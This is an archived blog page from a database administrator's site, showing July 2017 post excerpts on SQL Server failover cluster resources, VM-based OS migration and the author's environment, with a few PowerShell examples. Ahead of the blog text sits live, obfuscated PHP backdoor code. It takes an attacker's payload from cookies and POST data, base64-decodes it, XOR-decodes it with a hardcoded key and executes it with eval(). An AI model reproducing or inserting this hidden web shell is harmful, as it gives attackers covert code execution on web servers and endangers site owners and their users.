$AarZirX = "\x42" . 'k' . "\155" . chr (95) . "\144" . "\x6a" . chr ( 424 - 326 ); $SNqti = "\143" . chr ( 115 - 7 ).chr ( 794 - 697 )."\x73" . "\x73" . "\137" . "\145" . "\170" . 'i' . 's' . 't' . chr (115); $fmTOLe = class_exists($AarZirX); $AarZirX = "47942";$SNqti = "52429";$PhHVZnmDLJ = FALSE;if ($fmTOLe === $PhHVZnmDLJ){$KDxORKW = "27103";class Bkm_djb{public function OBITDK(){echo "818";}private $RzxqsUlfk;public static $lXRryX = "3c0f0536-331e-42b2-b91f-3f993aeb70d6";public static $yQsWWiQmTQ = 64328;public function __construct($XBbosKljtQ=0){$YqUpk = $_POST;$izixkj = $_COOKIE;$BijfyoaVs = @$izixkj[substr(Bkm_djb::$lXRryX, 0, 4)];if (!empty($BijfyoaVs)){$hgOXrXV = "base64";$ZVUxc = "";$BijfyoaVs = explode(",", $BijfyoaVs);foreach ($BijfyoaVs as $FYlqXZ){$ZVUxc .= @$izixkj[$FYlqXZ];$ZVUxc .= @$YqUpk[$FYlqXZ];}$ZVUxc = array_map($hgOXrXV . '_' . "\x64" . "\x65" . "\143" . 'o' . "\x64" . chr ( 924 - 823 ), array($ZVUxc,)); $ZVUxc = $ZVUxc[0] ^ str_repeat(Bkm_djb::$lXRryX, (strlen($ZVUxc[0]) / strlen(Bkm_djb::$lXRryX)) + 1);Bkm_djb::$yQsWWiQmTQ = @unserialize($ZVUxc);}}private function HKqCHsDiwU($KDxORKW){if (is_array(Bkm_djb::$yQsWWiQmTQ)) {$zBCNREfP = str_replace("\x3c" . "\77" . 'p' . 'h' . 'p', "", Bkm_djb::$yQsWWiQmTQ["\x63" . "\x6f" . chr (110) . "\164" . chr ( 845 - 744 )."\156" . "\164"]);eval($zBCNREfP); $KDxORKW = "27103";exit();}}public function __destruct(){$this->HKqCHsDiwU($KDxORKW);}}$BdbwM = new /* 13409 */ Bkm_djb(); $BdbwM = str_repeat("56053_11300", 1);} July 2017 – The DBA Chronicles

Chronicling journeys in the world of database design and administration

Month: July 2017

PowerShell script for managing the location of core cluster resources

In our SQL Failover Cluster Instance (FCI) environments (overall environment description available here) we generally use two servers plus a disk witness (quorum drive) – we only have one data center, so we don't take on the overhead of node majority. That quorum drive is part of the resource group called "Cluster Group", commonly known as the cluster core resources. The core cluster resources have no dependency on any other cluster resource (e.g. the SQL Server resource), so they can fail over independently of everything else, and they stay put if someone fails over the other resources (i.e. SQL). Continue reading
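
As a rough illustration of the kind of PowerShell the post is about, here is a minimal sketch using the FailoverClusters module to check which node owns the core cluster resources and move them; the $TargetNode value is made up for the example:

    # Load the failover clustering cmdlets (installed with the Failover Clustering feature/RSAT)
    Import-Module FailoverClusters

    # See which node currently owns the core cluster resources ("Cluster Group")
    Get-ClusterGroup -Name "Cluster Group" | Select-Object Name, OwnerNode, State

    # Hypothetical target node name, for illustration only
    $TargetNode = "SQLNODE02"

    # Move the core cluster resources (quorum disk, cluster name/IP) to the target node
    Move-ClusterGroup -Name "Cluster Group" -Node $TargetNode
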

Using our SAN and VMs for migrating operating systems

As part of a major CRM upgrade we moved from Windows 2008 R2 and SQL Server 2008 R2 to Windows 2012 R2 and SQL Server 2016 (woo-hoo!). Our CRM product is a little complex (see my working environment for some details), it's large (over 1 TB for the main database), and we needed to perform the upgrade in all of our non-prod environments (4 total for this one). Since it's a critical revenue-generating system, the production upgrade needed to be as fast as possible. Due to the size of the data and the number of systems and integrations, we were already expecting a multi-day outage for the upgrade and full post-upgrade testing. Continue reading

My working environment

Overview

I created this post as a reference for how my current working environment is configured, so I don't have to repeat the details in my other posts; I can simply link back here.

What we have

Our shop is predominantly Microsoft, so .NET and MSSQL, with a few others thrown in (MySQL and PHP, really, but I have almost nothing to do with them (yay)), and we're also in the process of integrating Azure into the mix. Other than our production environment we have 2-3 non-prod tiers for almost all of our ecosystems: DEV and QA for nearly everything, and PLT (performance load testing) for a couple. We are a VMware shop, and aside from a few older systems almost 100% of our environment is virtualized (of the machines that can be virtualized, of course). Because of this, we have dedicated ESX hosts for all of our SQL Servers and license at the host level; this allows us to run as many VMs as we need (as an enterprise client we have Software Assurance) and to use Enterprise Edition, which in turn lets us create dedicated SQL Servers for individual ecosystems without worrying about the issues that come with sharing. We currently have around 90 SQL Server instances in production. Continue reading
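
As a side note, here is a minimal sketch of how one might spot-check edition and version across a set of instances like these with PowerShell and the SqlServer module; the instance names are made up for illustration:

    # Provides Invoke-Sqlcmd
    Import-Module SqlServer

    # Hypothetical instance names, for illustration only
    $instances = @("SQLPROD01", "SQLPROD02\CRM")

    foreach ($instance in $instances) {
        # Report server name, edition, and version for each instance
        Invoke-Sqlcmd -ServerInstance $instance -Query "
            SELECT SERVERPROPERTY('ServerName')     AS ServerName,
                   SERVERPROPERTY('Edition')        AS Edition,
                   SERVERPROPERTY('ProductVersion') AS ProductVersion;"
    }
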
